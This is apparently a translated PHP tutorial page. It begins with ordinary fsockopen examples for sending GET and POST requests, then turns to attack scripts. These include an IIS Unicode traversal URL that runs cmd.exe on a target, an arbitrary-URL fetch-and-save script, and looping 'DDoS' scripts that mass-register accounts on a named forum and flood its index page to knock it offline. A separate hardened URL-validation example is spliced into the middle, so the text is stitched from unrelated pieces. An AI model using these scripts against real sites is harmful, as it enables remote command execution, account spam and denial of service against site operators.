To send POST and GET requests from PHP, you can use the fsockopen function:
Example 1. fsockopen() Example
<?php
$fp = fsockopen("www.example.com", 80, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    $out = "GET / HTTP/1.1\r\n";
    $out .= "Host: example.com\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fputs($fp, $out);
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
    fclose($fp);
}
?>
Example 2. Using UDP connection
<?php
$fp = fsockopen("udp://127.0.0.1", 13, $errno, $errstr);
if (!$fp) {
    echo "ERROR: $errno - $errstr<br />\n";
} else {
    fwrite($fp, "\n");
    echo fread($fp, 26);
    fclose($fp);
}
?>
Example 3
<?php
// Define the connection parameters
$urls = array(
    'host'=>'localhost',
    'port'=>80,
    'path'=>'/index.php',
    'method'=>'POST',
    'protocol'=>'1.0',
);
// Parameters passed with the POST method
$ps = array(
    'language'=>'php',
    'linux'=>'redhat',
);
// Parameters passed with the GET method
$gs = array(
    'php'=>5,
    'redhat'=>9
);
/**
Returns: the string (string) returned by the server for the POST or GET request
Parameters:
$urls : array
$ps : array
$gs : array
Usage:
getData($urls,$ps,'') // use the POST method
getData($urls,'',$gs) // use the GET method
Reference: http://cn.php.net/manual/en/function.fsockopen.php
*/
function getData($urls, $ps = '', $gs = '') {
    $host = $urls['host'];
    $port = $urls['port'];
    $path = $urls['path'];
    $method = $urls['method'];
    $protocol = $urls['protocol'];
    $posts = '';
    $gets = '';
    // Build the URL-encoded request body from the POST parameters
    if (is_array($ps)) {
        foreach ($ps as $k => $v) {
            $posts .= urlencode($k)."=".urlencode($v).'&';
        }
        $posts = substr($posts, 0, -1);
    }
    // Build the URL-encoded query string from the GET parameters
    if (is_array($gs)) {
        foreach ($gs as $k => $v) {
            $gets .= urlencode($k)."=".urlencode($v).'&';
        }
        $gets = substr($gets, 0, -1);
    }
    $fp = fsockopen($host, $port, $errno, $errstr, 3);
    if (!$fp) {
        echo "can't connect...\r\n<br>Error:$errstr";
        return;
    }
    // Append the query string only when there is one
    $target = ($gets != '') ? "$path?$gets" : $path;
    fputs($fp, "$method $target HTTP/$protocol\r\n");
    // The Host header must name the host being requested
    fputs($fp, "Host: $host\r\n");
    if ($posts != '') {
        fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-Length: ".strlen($posts)."\r\n");
    }
    // Every header comes before the blank line; the body follows it
    fputs($fp, "Connection: Close\r\n\r\n");
    if ($posts != '') {
        fputs($fp, $posts);
    }
    // Read the whole response (status line, headers and body)
    $s = '';
    while (!feof($fp)) {
        $data = fgets($fp, 1024);
        if ($data === false) {
            break;
        }
        $s .= $data;
    }
    fclose($fp);
    return $s;
}
// Fetch the string returned by the target page using the POST method
echo getData($urls, $ps, '');
// To use the GET method instead, switch the request method and call it like this:
$urls['method'] = 'GET';
echo getData($urls, '', $gs);
?>
3. Unicode vulnerability attack
Code:
<?php
$fp=@fopen($url,"r") or die ("cannot open $url");
while($line=@fgets($fp,1024)) {
    $contents.=$line;
}
echo $contents; // display the file contents
fclose($fp); // close the file
?>
Usage:
/XXXX.php?url=http://target/script/..%c1%1c../winnt/system32/cmd.exe?/c+dir
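A hardened counterpart to the fetch script above, as an added example that is not part of the original page: it checks the `url` parameter before anything is opened. The allow-list `ALLOWED_HOSTS`, the function names `rejectReason` and `fetchChecked`, and the sample URLs other than the one quoted above are assumptions made for illustration.

```php
<?php
// Added example. ALLOWED_HOSTS and the sample URLs are constructed values.
const ALLOWED_HOSTS = ['www.example.com'];

// Returns null when the URL may be fetched, otherwise the reason for refusal.
function rejectReason(string $url): ?string
{
    $p = parse_url($url);
    // Only web schemes: refuses file://, php://, ftp:// and other fopen wrappers.
    if ($p === false || !in_array(strtolower($p['scheme'] ?? ''), ['http', 'https'], true)) {
        return 'scheme not allowed';
    }
    // user:pass@host can hide the real destination from a casual reader.
    if (isset($p['user']) || isset($p['pass'])) {
        return 'credentials in URL';
    }
    // Exact-match allow-list, so the server cannot be pointed at arbitrary hosts.
    if (!in_array(strtolower($p['host'] ?? ''), ALLOWED_HOSTS, true)) {
        return 'host not on allow-list';
    }
    // Decode the path once; refuse byte sequences that are not valid UTF-8
    // (such as %c1%1c), then refuse traversal and backslashes.
    $path = rawurldecode($p['path'] ?? '/');
    if (preg_match('//u', $path) !== 1) {
        return 'path is not valid UTF-8';
    }
    if (strpos($path, '..') !== false || strpos($path, '\\') !== false) {
        return 'path traversal';
    }
    return null;
}

// Fetches an accepted URL without following redirects and with a size cap.
function fetchChecked(string $url, int $maxBytes = 65536): string
{
    if (($why = rejectReason($url)) !== null) {
        throw new InvalidArgumentException("refused: $why");
    }
    $ctx = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 5]]);
    $body = file_get_contents($url, false, $ctx, 0, $maxBytes);
    return $body === false ? '' : $body;
}

// Constructed inputs; only validated here, so no network access is needed.
foreach (['http://www.example.com/news/index.html', 'file:///etc/passwd',
          'http://target/script/..%c1%1c../winnt/system32/cmd.exe?/c+dir',
          'http://www.example.com/script/..%c1%1c../x'] as $u) {
    printf("%-62s %s\n", $u, rejectReason($u) ?? 'ok');
}
```

Only the first sample URL is accepted; the others are refused for scheme, host and invalid path encoding respectively.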
4. Transferring files between web servers:
The code for this example is taken from PHP FLAME:
<?php
$fp = fopen($_GET['filename'], 'rb');
$data = $tmp = '';
while ( true ) {
$tmp = fgets($fp, 1024);
if ( 0 === strlen($tmp) ) {
break;
}
$data .= $tmp;
}
fclose($fp);
$file=preg_replace("/^.+\//","",$filename);
//write
$fp = fopen("$file", 'wb');
fwrite($fp, $data);
fclose($fp);
?>
5. HTTP proxy (http://jsw.china12e.com/600/)
Code taken from PHP FLAME:
<?
$url = getenv("QUERY_STRING");
if(!ereg("^http",$url))
{
echo "example:<br>xxx.php?http://jsw.china12e.com/<br>";
exit;
}
if($url)
$url=str_replace("\\","/",$url);
$f=@fopen($url,"r");
$a="";
if($f)
{
while(!feof($f))
$a.=@fread($f,8000);
fclose($f);
}
$rooturl = preg_replace("/(.+\/)(.*)/i","\\1",$url);
$a = preg_replace("/(src[[:space:]]*=['\"])([^h].*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(src[[:space:]]*=)([^h'\"].*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(action[[:space:]]*=['\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(action[[:space:]]*=)([^h'\"].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(<a.+?href[[:space:]]*=['\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(<a.+?href[[:space:]]*=[^'\"])([^h].*?)/is","\\1$php_self?$rooturl\\2",$a);
$a = preg_replace("/(link.+?href[[:space:]]*=[^'\"])(.*?)/is","\\1$rooturl\\2",$a);
$a = preg_replace("/(link.+?href[[:space:]]*=['\"])(.*?)/is","\\1$rooturl\\2",$a);
echo $a;
?>
6. Unstoppable DDoS attack
An example of DDoS
<?php
$url="http://bbs.icehack.com/register.php?step=2&addpassword=
aaaaaa&addpassword2=aaaaaa&addemail=asdfasd@dfsadsf.com&addusername=";
for($i=1131;$i<=1150;$i++)
{
$urls=$url.$i;
$f=@fopen($urls,"r");
$a=@fread($f,10);
fclose($f);
}
?>
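After it runs, the forum will have 20 new users
(example: http://bbs.icehack.com/userlist.php?page=827).
When it is used against the forum's search function,
a DDoS attack is achieved.
The following code attacks the index.php file; when ten processes run at the same time, it may cause the forum to shut down.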
<?php
$url="http://bbs.icehack.com/index.php?addusername=";
for($i=1131;$i<=1180;$i++)
{
$urls=$url.$i;
$f=@fopen($urls,"r");
$a=@fread($f,10);
fclose($f);
}
?>
7. SQL injection attacks, search engines..